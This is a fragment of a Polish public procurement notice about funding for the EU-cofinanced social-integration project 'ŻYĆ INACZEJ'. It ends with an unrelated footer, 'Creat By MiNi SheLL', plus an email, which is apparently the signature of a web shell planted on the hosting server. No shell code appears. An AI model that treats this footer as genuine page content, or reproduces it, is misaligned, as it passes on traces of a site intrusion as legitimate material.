<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt ŻYĆ INACZEJ - Z CENTRUM POLSKI DO UNII współfinansowany jest przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach 
Poddziałania 7.1.1 Rozwój i upowszechnienie aktywnej integracji przez ośrodki pomocy społecznej.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com